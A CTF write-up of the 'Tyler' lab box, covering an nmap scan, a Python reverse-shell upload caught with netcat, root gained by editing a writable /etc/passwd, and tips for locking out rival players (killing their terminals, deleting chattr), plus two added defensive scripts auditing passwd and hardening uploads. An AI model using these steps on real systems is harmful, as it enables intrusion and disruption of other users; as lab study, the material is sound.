Tyler machine Writeup

trustie_rity
5 min read · Jun 28, 2022

TYLER WRITEUP
- I am trustie_rity and in this writeup I will show a detailed walkthrough of solving the Tyler machine, i.e. getting root and then trying to secure root.txt.

Enumeration

A quick nmap scan gives the following information about our target.

# Nmap 7.92 scan initiated Mon May 9 22:30:18 2022 as: nmap -sC -sV -oN nmap_scan 10.10.85.217 
Nmap scan report for 10.10.85.217
Host is up (0.22s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 46:6c:5a:31:5f:c1:1f:f3:65:e7:64:f2:c5:f5:59:d8 (RSA)
| 256 5d:a5:8a:af:1e:21:48:7a:04:22:3e:4a:f5:e4:5b:02 (ECDSA)
|_ 256 6a:44:1c:e1:15:c9:5e:94:da:06:8d:db:d2:bc:66:54 (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/7.3.16)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/7.3.16
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
445/tcp open netbios-ssn Samba smbd 4.9.1 (workgroup: SAMBA)
3306/tcp open mysql MariaDB (unauthorized)
|_sslv2: ERROR: Script execution failed (use -d to debug)
5000/tcp open http Werkzeug httpd 1.0.0 (Python 3.6.8)
8080/tcp open http nginx 1.16.1
|_http-server-header: nginx/1.16.1
9593/tcp filtered cba8
9999/tcp open abyss?
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 200 OK
| Accept-Ranges: bytes
| Content-Length: 1
| Content-Type: text/plain; charset=utf-8
| Last-Modified: Thu, 26 Mar 2020 11:36:37 GMT
| Date: Mon, 09 May 2022 19:32:40 GMT
| GenericLines, Help, Kerberos, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest, HTTPOptions:
| HTTP/1.0 200 OK
| Accept-Ranges: bytes
| Content-Length: 1
| Content-Type: text/plain; charset=utf-8
| Last-Modified: Thu, 26 Mar 2020 11:36:37 GMT
|_ Date: Mon, 09 May 2022 19:32:38 GMT
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: Host: TYLER
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
|_clock-skew: mean: 1h20m00s, deviation: 2h18m37s, median: -1s
| smb2-time:
| date: 2022-05-09T19:34:35
|_ start_date: N/A
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: TYLER, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.9.1)
| Computer name: tyler
| NetBIOS computer name: TYLER\x00
| Domain name: \x00
| FQDN: tyler
|_ System time: 2022-05-09T15:34:29-04:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon May 9 22:35:04 2022 -- 1 IP address (1 host up) scanned in 286.08 seconds

From the scan we get the hostname (TYLER), so we quickly add it to /etc/hosts.

Gaining initial Foothold
- Checking port 80 we get an image, so I proceed to check ports 5000 and 8080. On port 5000:

And on port 8080:

- Since we are in a hurry to get into the system, I am just looking for something juicy.
  - Port 5000 is where I found the juicy thing :)
  - From my nmap scan I can tell it is a Python 3 server hosted there.
  - I try to upload an arbitrary file and I get this error:
Allowed file types are txt, pdf, png, jpg, jpeg, gif, py

Nice! I tell myself, since a .py file can be uploaded. To try my luck I upload this script:

I set up a listener before I upload :)

nc -nlvp 5000

And luckily we get a shell back as user narrator ^_^

- So quickly I do the honors and stabilise the shell, i.e.
python3 -c "import pty;pty.spawn('/bin/bash')"
export TERM=xterm
ctrl+z   (background the shell)
stty raw -echo; fg

Getting root

After looking around for a while I realised I could edit the /etc/passwd file, for reasons I can't explain ^_^
So let's create a password for user narrator:

openssl passwd -1 haha
Folks who are really good at these things will tell you that doing this is not secure, since the password ends up in the shell history, but in this case do we care?

Copy that hash and replace the x in narrator's /etc/passwd entry (see the picture) with it.

It should then look like this:

narrator:$1$nU6cGcCY$QFVNt/5D4gEU1AR0IEk/A1:1002:1002::/home/narrator:/bin/bash

Now we can easily get root by doing this:

sudo -i
# enter haha as the password, then hit enter
echo tryhackme_username > king.txt
chattr +i king.txt
rm -rf chattr

With that you can now wait comfortably to see how the game ends.
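As an added, defender-side example that is not part of the original writeup: a small audit that spots exactly the two conditions the privilege escalation above relied on, a /etc/passwd that non-root users can write, and a real hash sitting in the password field instead of the "x" that defers to /etc/shadow. The sample file content is constructed; the narrator line is the one shown above.

```python
import os
import stat

# Constructed sample of /etc/passwd after the edit made in the writeup: the
# narrator entry carries an MD5-crypt hash where "x" (defer to /etc/shadow)
# should be, so login and sudo validate against /etc/passwd directly.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
sync:*:5:0:sync:/sbin:/bin/sync
tdurden:x:1001:1001::/home/tdurden:/bin/bash
narrator:$1$nU6cGcCY$QFVNt/5D4gEU1AR0IEk/A1:1002:1002::/home/narrator:/bin/bash
"""

# Values that legitimately appear in the password field of /etc/passwd.
PLACEHOLDERS = {"x", "*", "!", "!!"}


def find_passwd_hashes(text):
    """Return (user, uid, reason) for entries that bypass /etc/shadow."""
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:  # malformed line, not this check's concern
            continue
        user, pw, uid = fields[0], fields[1], int(fields[2])
        if pw == "":
            findings.append((user, uid, "empty password field"))
        elif pw not in PLACEHOLDERS:
            findings.append((user, uid, "hash stored in /etc/passwd"))
    return findings


def passwd_mode_issues(mode, owner_uid):
    """Check ownership and write bits; /etc/passwd should be root:root 0644."""
    issues = []
    if owner_uid != 0:
        issues.append("not owned by root")
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        issues.append("group or world writable")
    return issues


def audit_passwd_file(path="/etc/passwd"):
    """Run both checks against a real file; returns (mode_issues, entries)."""
    st = os.stat(path)
    with open(path) as fh:
        entries = find_passwd_hashes(fh.read())
    return passwd_mode_issues(st.st_mode, st.st_uid), entries
```

Running audit_passwd_file() on the box after the edit would flag the narrator entry; on a clean CentOS install both lists come back empty.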

Tips

- Use "w" or "who" to check how many users are currently logged in.
- Kill their pts if you're angry :laughing: like this: "pkill -9 -t pts/1"
- Where pts/1 is their pts...
- Try patching the file upload, e.g. by commenting out the line that saves the file on the server, or any other way you find better. For me, I just used the easiest one.
- That way no one will get into the server the way we came in.
- Some flags are in the narrator and tdurden home directories.
- The other flag I found was root.txt in the root directory.
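As an added example that is not part of the original writeup or the box's own code, and as a less drastic patch than commenting out the save: the extension-only allowlist from the upload error message earlier beside a hardened version, assuming the upload handler is a Werkzeug/Flask-style function (the function names here are hypothetical).

```python
import os
import uuid

# Extension list from the error message on the Tyler box. "py" is the weak
# link: a script extension inside an upload allowlist.
WEAK_ALLOWED = {"txt", "pdf", "png", "jpg", "jpeg", "gif", "py"}

# Hardened allowlist: inert document and image types only.
SAFE_ALLOWED = {"txt", "pdf", "png", "jpg", "jpeg", "gif"}

# Expected leading bytes for the binary types we accept (constructed table).
MAGIC = {
    "pdf": (b"%PDF-",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}


def weak_allowed_file(filename):
    """Extension-only check of the kind the box uses: shell.py passes."""
    return "." in filename and filename.rsplit(".", 1)[1].lower() in WEAK_ALLOWED


def hardened_upload_name(filename, data):
    """Return a server-chosen on-disk name for the upload, or None to reject.

    The client's name is only consulted for its final extension; the stored
    name is random, so path components and double extensions never reach
    disk. Binary types must start with the matching magic bytes.
    """
    base = os.path.basename(filename.replace("\\", "/"))
    if "." not in base:
        return None
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in SAFE_ALLOWED:
        return None
    if ext in MAGIC and not data.startswith(MAGIC[ext]):
        return None
    if ext == "txt" and b"\x00" in data:  # binaries disguised as text
        return None
    return f"{uuid.uuid4().hex}.{ext}"
```

Storing the upload under the returned name, outside any directory the server executes or imports from, closes the path we used to get in while keeping the upload feature working.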

Connect with me :)

trustie_rity

Offensive Penetration Tester | M4lici0s Lif3 | Find video walkthroughs on my yt channel: https://www.youtube.com/@trustie_rity